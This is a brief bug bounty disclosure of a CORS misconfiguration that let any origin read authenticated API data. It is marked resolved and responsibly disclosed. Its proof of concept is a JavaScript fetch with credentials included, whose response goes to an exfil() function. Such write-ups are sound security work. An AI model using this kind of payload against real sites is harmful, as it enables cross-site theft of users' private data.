CORS Private Program 2024-11-01
CORS Misconfiguration Allows Credential Theft
Severity: High | Status: Resolved
Summary
The API reflected any Origin header with Access-Control-Allow-Credentials: true.
Proof of Concept
fetch('https://api.target.com/user/data', {
credentials: 'include'
}).then(r => r.json()).then(d => exfil(d));Impact
Cross-site theft of authenticated user data.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.